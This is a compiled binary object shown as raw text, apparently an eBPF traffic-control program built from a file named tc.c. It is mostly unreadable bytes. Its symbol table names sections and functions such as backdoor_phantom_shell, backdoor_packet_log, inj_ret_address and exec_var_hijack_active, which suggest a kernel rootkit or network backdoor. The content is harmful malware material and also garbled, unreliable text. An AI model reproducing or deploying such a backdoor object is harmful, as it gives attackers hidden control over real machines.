$.J\ & Z &.Z <03> <03>~..T - SJ- SJ 0  '.I 8 H<>>.!A <03> @<40><03> <03>X<03>.-!<03>XC<03> 2 <03>.<03> <08>$ .7v<*<G.<.<03> <03> q<> <03><<03> <03> <03> V (K<05>"<14>  <03> <03> <03><03> !  ! !A A1H1<03> <03> <03><EFBFBD><03> <03>t<03>.<2E>!= ! <03> <03>  <03>J<03>  Kq<> 9=G  K<03>~ <03><01>Y<03>~ <03>.<03>~<03> 6<>A  K!<03>~<7E><03><01>Y<03>~ <03> &@)  =<03>~ <03> <03>~X<03> =!!<21>$.<03>~ <03><01>.<03>~ <03><08>.<03>~ <03><01>A<03>~ <03><01><03>~ <03>.<03>~ <03> <03>~ <03>X<  !< $4<03>~<7E><03> Yg!!%$.<03>~ <03> .<03>~ <03> .<03>~ <03><<03>~.<03> :! Y<03>~ <03>.<03>~<7E><03> !Y<03>~ <03> <03>~.<03>  <03>'
"#<03>} <03> <03>}<7D><03> 3.<03>}  <03> <03>}.
<03>fJ<03>} <03> <03>} <03>.<03>}.<03> .<03>} <03> <03>}J<03> <03>X <03>. <03>} <03> B.<03>} <03> <03>}<7D><03>.!<03>} <03>.<03>}X<03> <03>}<<03> <03>}X<03>.-!<03>}XC<03> 2./<08>%<03>}.7<03> *JG<<.&"* ./.!<03>}<08><03> <03>}<<03> <20>"<03>}<*<00><><00>P<00><00>B8<00><00>o<00>
<00>8 <00><00> p`2@<00><00><00><00>g<00>Yp<00>xhJ0*p<00><00><00>Xp_<00><00><00>W(<00><00><00><00>0"<00><00><00>O<00>8`<00><00><00><00><00><00>w<00><00><00><00>x<00>:<00><00>X<00><00>R `<00>hH<00>
 <00> <00><00> <00>h <00>(H<00>"`<00>H <00><00> <00>( p<00> 0:(
:0N0<00>0_0<00>0*0<00>00J0<00>0<00>0 0i0<00>0<00>00e0<00>00<00>0<00>1 1<1o1<00>1<00>131y1<00>1<00>1
3
5
5
6
5&
4+
587M
5T
5[
5g?p
5x
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5
5'
53
5I
5P
5c
5o=x
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>9
5 
5
5$
50
5Y
5a
5m
5<00>
5<00>
5<00>
5<00>8<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5#
50
57
5C:L
5T
5`
5l
5x
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>@<00>
5<00>
5<00>
5
5
5"
5*
56
5B
5N
5Z
5f
5w
5~
5<00>><00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5
5+
52
5E
5f
5w
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5
5(
55
5B
5O
5\
5i
5v
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5#
50
5M
5[
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5-
5:
5V
5c
5r
5
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5"
5/
5<
5I
5V
5c
5p
5~
5<00>
5<00>
5<00>
5)
5X
5d
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5
5
5
5%
5,
53
5:
5K
5Q
5W
5]
5i
5q
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5
5
5
5,
58
5D
5S
5b
5q
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5<00>
5
5 0
5*
2.
5=
5H
2L
5W
2[
5f
2j
5u
2y
5<00>
2<00>
5<00>
5<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5
2
5
2
5!
2%
50
5;
5F
5Q
5\
2`
5k
2o
5z
5<00>
2<00>
5<00>
5<00>0<00>
5<00>0<00>
2<00>
5<00>
4<00>
5<00>0<00>
5 0
5(
41
5=
4F
5R
4[
5g
4p
5|0<00>
5<00>0<00>
5<00>0<00>
5<00>
4<00>
5<00>
4<00>
5<00>
4
5 0
5(08
5D0T
5`0p
5|0<00>
5<00>0<00>
5<00>0<00>
2<00>
5<00>0<00>
5<00>0<00>
5 0
5%05
5A0Q
5_1m
5y
2}
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5<00>
2<00>
5 
4
51.
5;1H
2L
5Y
4a
5n1~
5<00>1<00>
5<00>1<00>
5<00>
4<00>
5<00>
4<00>
5<00>
4<00>
51
5!
4)
58
5@
5L
5X
500000080@0H0P0X0`0h0p0x0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 0(00080@0H0P0X0`0h0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>1<00>1<00>1<00>111 1(1@1H1P1X1`1h1<00>1<00>1<00>1<00>1<00>1<00>1<00>1<00>1<00>1<00>1<00>1<00>100 1(1<00>:<00>?<00>=<00>9<00>8<00>@<00>> 7,0<1P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>000 000@0P0`0p0<00>0<00>0<00>0<00>0<00>0<00>0<00>0<00>0 0 0 00 0@ 0P 0` 0p 0<00> 0<00> 0<00> 0<00> 0<00> 0<00> 0<00> 0<00> 0
0
0(
18
1H
1X
1h
1x
1<00>
1<00>
1<00>
1<00>
1<00>
1<00>
1<00>
1<00>
1 1 1( 18 1H 1X 1h 1x 1<00> 1<00> 1<00> 1<00> 1<00> 1<00> 1<00> 1<00> 1 1 1( 18 1H 1X 1h 1x 1<00> 1<00> 1<00> 1<00> 1<00> 1<00> 1<00> 1<00> 1 1 1( 18 1H 1X 1h 1081_0<00>1.debug_abbrev.text.rel.BTF.extclassifier_ingressclassifier/ingressclassifier_egress.relclassifier/egressinj_ret_address.maps.rel.debug_ranges.debug_str.rel.debug_infofs_openbackdoor_phantom_shellfs_dir_logexec_var_hijack_active_license.rel.debug_line.rel.eh_frame.rel.debug_loctc.c.strtab.symtab.rel.BTFLBB1_9LBB0_59LBB0_49LBB0_39LBB0_29LBB0_19LBB0_68LBB0_38LBB1_7LBB0_7LBB0_67LBB0_57LBB0_47LBB0_37LBB0_27LBB0_17LBB0_66LBB0_36LBB0_26backdoor_packet_log_16LBB1_16.rodata.str1.16LBB1_5LBB0_5LBB0_65LBB0_55LBB0_35LBB0_25LBB1_15LBB0_15LBB0_34LBB1_3LBB0_3LBB0_63LBB0_33LBB0_23LBB1_13LBB0_13LBB1_2LBB0_52backdoor_packet_log_32LBB0_61LBB0_51LBB0_31LBB0_21LBB1_11LBB0_11.rodata.str1.1LBB0_50LBB0_20/<00><><00>@^@<00>Z <00><> 5<00>`<00>28"0<00>h"<00><00>2P#2<00><00>'<00>'  <00><00>
<00>0<00><00>2}<00> <00><>` <00>5G@<00> @<40><00><00>0uJ<00>
C<00>T<00>? <00><><00><00>tx  `<60>@ @<40>P  <00><> <00><>2<00> <00><> 7Ȉ7